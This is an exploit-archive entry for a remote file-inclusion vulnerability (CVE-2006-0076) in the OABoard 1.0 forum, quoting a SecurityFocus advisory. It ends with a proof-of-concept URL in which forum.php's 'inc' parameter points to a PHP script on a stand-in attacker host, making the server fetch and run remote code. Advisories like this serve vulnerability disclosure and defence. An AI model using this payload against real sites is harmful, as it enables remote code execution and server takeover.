OABoard 1.0 Forum - Remote File Inclusion
| EKU-ID: 32301 | CVE: CVE-2006-0076;OSVDB-22219 | OSVDB-ID: |
| Author: Aliaksandr Hartsuyeu | Published: 2005-12-29 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 32301 | CVE: CVE-2006-0076;OSVDB-22219 | OSVDB-ID: |
| Author: Aliaksandr Hartsuyeu | Published: 2005-12-29 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/16105/info The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application. This could result in the execution of arbitrary PHP code in the context of the webserver hosting the application. http://oaboard.example.com/oaboard_en/forum.php?inc=http://attacker.example.com/code.php